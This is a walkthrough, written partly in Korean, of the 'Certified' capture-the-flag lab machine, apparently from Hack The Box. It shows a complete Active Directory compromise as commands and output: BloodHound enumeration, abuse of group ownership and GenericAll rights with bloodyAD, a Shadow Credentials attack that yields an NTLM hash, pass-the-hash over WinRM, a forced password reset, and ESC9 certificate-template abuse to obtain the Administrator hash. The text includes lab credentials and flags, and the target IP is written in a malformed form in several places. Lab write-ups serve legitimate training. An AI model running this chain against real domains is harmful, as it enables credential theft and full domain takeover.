Certified

Proof of Concept

10.10.129.231.186

Nmap

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

---

Information Gathering

hosts 정보 수집

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb 10.10.129.231.186 --generate-hosts-file hosts
SMB         10.10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Certified]
└─$ cat hosts
10.10.129.231.186     DC01.certified.htb certified.htb DC01

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/Certified]
└─$ cat /etc/hosts
<SNIP>
10.10.129.231.186     DC01.certified.htb certified.htb DC01

BloodHound 정보 수집

┌──(kali㉿kali)-[~/Certified]
└─$ bloodhound-python -d 'certified.htb' -u 'judith.mader' -p 'judith09' -ns 10.10.129.231.186 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 37S
INFO: Compressing output into 20260131175618_bloodhound.zip

---

Initial Access

judith.mader:judith09

주어진 계정으로 SMB 인증 성공

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb 10.10.129.231.186 -u 'judith.mader' -p 'judith09'
SMB         10.10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.129.231.186  445    DC01             [+] certified.htb\judith.mader:judith09

BloodHound 확인

• The user JUDITH.MADER@CERTIFIED.HTB has the ability to modify the owner of the group MANAGEMENT@CERTIFIED.HTB.
• The members of the group MANAGEMENT@CERTIFIED.HTB have generic write access to the user MANAGEMENT_SVC@CERTIFIED.HTB.

Management 그룹 소유자를 judith.mader로 변경

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'judith.mader' -p 'judith09' --host 'certified.htb' set owner Management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on Management

Management 그룹에 대해 judith.mader 계정에 GenericAll 권한 추가

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'judith.mader' -p 'judith09' --host 'certified.htb' add genericAll Management judith.mader
[+] judith.mader has now GenericAll on Management

Management 그룹에 judith.mader 추가

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'judith.mader' -p 'judith09' --host 'certified.htb' add groupMember Management judith.mader
[+] judith.mader added to Management

Shadow Credentials attack을 수행하여 management_svc 계정 NTLM 해시 획득

• a091c1832bcdd4677c28b5a6a1295584

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad shadow auto -u 'judith.mader@certified.htb' -p 'judith09' -account 'management_svc' -target 10.10.129.231.186
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b0f02feb0aea40dda7adae76613b3dd8'
[*] Adding Key Credential with device ID 'b0f02feb0aea40dda7adae76613b3dd8' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'b0f02feb0aea40dda7adae76613b3dd8' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

획득한 해시를 사용하여 management_svc 계정으로 SMB 인증 성공

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb 10.10.129.231.186 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584'
SMB         10.10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.129.231.186  445    DC01             [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584

management_svc 계정으로 WinRM 인증 성공

┌──(kali㉿kali)-[~/Certified]
└─$ nxc winrm 10.10.129.231.186 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584'
WINRM       10.10.129.231.186  5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
WINRM       10.10.129.231.186  5985   DC01             [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)

WinRM 접속

┌──(kali㉿kali)-[~/Certified]
└─$ evil-winrm -i 10.129.231.186 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584'
 
Evil-WinRM shell v3.7
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents

Read user.txt

*Evil-WinRM* PS C:\Users\management_svc\Desktop> type user.txt
0d3887eec55c7706eaf12e0d2de8613a
*Evil-WinRM* PS C:\Users\management_svc\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.231.186
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

---

Privilege Escalation

BloodHound 확인

• The user MANAGEMENT_SVC@CERTIFIED.HTB has GenericAll permissions to the user CA_OPERATOR@CERTIFIED.HTB.

CA_OPERATOR 계정 비밀번호를 “1q2w3e4r”로 변경

┌──(kali㉿kali)-[~/Certified]
└─$ bloodyAD -d 'certified.htb' -u 'management_svc' -p ':a091c1832bcdd4677c28b5a6a1295584' --host 'certified.htb' set password CA_OPERATOR 1q2w3e4r
[+] Password changed successfully!

변경된 비밀번호로 SMB 인증 성공

┌──(kali㉿kali)-[~/Certified]
└─$ nxc smb certified.htb -u 'CA_OPERATOR' -p '1q2w3e4r'
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.186  445    DC01             [+] certified.htb\CA_OPERATOR:1q2w3e4r

certipy 취약점 스캔

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad find -vulnerable -u ca_operator -p 1q2w3e4r -dc-ip 10.129.231.186 -target-ip 10.129.231.186
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260201051110_Certipy.txt'
[*] Wrote text output to '20260201051110_Certipy.txt'
[*] Saving JSON output to '20260201051110_Certipy.json'
[*] Wrote JSON output to '20260201051110_Certipy.json'

CertifiedAuthentication 템플릿에서 ESC9 취약점 발견

┌──(kali㉿kali)-[~/Certified]
└─$ cat 20260201051110_Certipy.txt
<SNIP
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

GenericAll 권한을 가진 management_svc 계정을 사용하여 ca_operator 계정의 UPN을 Administrator로 변경

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad account update -u 'management_svc' -hashes ':a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.129.231.186 -user 'ca_operator' -upn 'Administrator'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

Requested a certificate as the “ca_operator” user from the ESC9 template (CertifiedAuthentication)

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad req -u 'ca_operator' -p '1q2w3e4r' -dc-ip 10.129.231.186 -target 'certified.htb' -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Revert the “ca_operator” account’s UPN

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad account update -u 'management_svc' -hashes ':a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.129.231.186 -user 'ca_operator' -upn 'ca_operator.certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator.certified.htb
[*] Successfully updated 'ca_operator'

Authenticated as the target administrator and successfully retrieved administrator’s NTLM hash

┌──(kali㉿kali)-[~/Certified]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb' -dc-ip 10.129.231.186
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

획득한 administrator NTLM 해시로 WinRM 접속

┌──(kali㉿kali)-[~/Certified]
└─$ evil-winrm -i 10.129.231.186 -u 'administrator' -H '0d5b49608bbce1751f708748f67e2d34'
 
Evil-WinRM shell v3.7
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
144201af105364df3965d488505dd6ed
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.231.186
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1